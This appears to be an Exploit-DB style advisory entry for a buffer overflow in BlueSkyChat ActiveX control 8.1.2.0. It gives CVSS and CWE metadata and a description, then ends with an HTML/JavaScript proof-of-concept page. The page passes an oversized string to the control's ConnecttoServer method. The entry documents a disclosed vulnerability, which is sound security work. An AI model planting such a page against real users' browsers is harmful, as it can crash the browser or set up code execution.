BlueSkyChat ActiveX Control Buffer Overflow Vulnerability

vendor:

BlueSkyChat ActiveX Control

by:

Unknown

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: BlueSkyChat ActiveX Control

Affected Version From: 8.1.2.0

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE: Unknown

Metasploit:

Other Scripts:

Platforms Tested: Windows

Unknown

BlueSkyChat ActiveX Control Buffer Overflow Vulnerability

BlueSkyChat ActiveX control is prone to a buffer-overflow vulnerability because it fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer. Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.

Mitigation:

Unknown

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/25149/info

BlueSkyChat ActiveX control is prone to a buffer-overflow vulnerability because it fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.

Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.

BlueSkyChat ActiveX control 8.1.2.0 is vulnerable to this issue; other versions may also be affected. 

<html>
<head>
<OBJECT ID="com" CLASSID="CLSID:{2EA6D939-4445-43F1-A12B-8CB3DDA8B855}">
</OBJECT>
</head>
<body>
<SCRIPT language="javascript">

function ClickForRunCalc()
{
    var heapSprayToAddress = 0x0d0d0d0d;

    var payLoadCode = "A" ;
    while (payLoadCode.length <= 10000) payLoadCode+='A';
    com.ConnecttoServer("1",payLoadCode,"3","4","5");
}
</script>
<button onclick="javascript:ClickForRunCalc();">ClickForRunCalc</button>
</body>
</html>